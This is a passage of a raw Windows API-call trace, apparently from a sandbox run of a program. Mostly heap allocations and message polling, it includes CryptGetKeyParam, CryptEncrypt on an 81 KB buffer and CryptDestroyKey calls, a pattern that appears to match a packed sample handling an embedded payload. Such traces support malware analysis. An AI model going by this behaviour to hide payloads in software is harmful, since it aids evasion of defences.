Size=0x44) returned 0x88e0e8 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0041.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.348] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.348] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0041.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0041.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0041.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0041.349] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0041.349] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.349] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.349] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.349] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0041.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.349] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.349] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0041.349] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.350] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.350] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.350] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0041.350] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.350] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0041.350] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.350] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.350] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.350] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.350] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.350] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0041.350] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.351] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.351] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x13ec2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x13ed0) returned 1 [0041.351] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.351] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.351] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.351] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.351] CharLowerBuffW (in: lpsz="byte[81617]", cchLength=0xb | out: lpsz="byte[81617]") returned 0xb [0041.351] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.353] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.354] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.355] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.355] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x95cda8*, pdwDataLen=0x6ae220*=0x13ec2, dwBufLen=0x13ed0 | out: pbData=0x95cda8*, pdwDataLen=0x6ae220*=0x13ed0) returned 1 [0041.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.359] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.359] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.359] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.359] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.359] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.359] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.359] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.359] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.359] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.359] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.360] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0041.360] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.368] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.368] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.368] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.368] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.373] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.373] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.373] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.373] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.373] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.373] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0041.373] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.373] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.374] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.374] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.374] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.374] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.374] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.374] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.374] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.374] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.374] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.374] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.374] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.374] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0041.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.375] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.375] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.375] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.375] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, 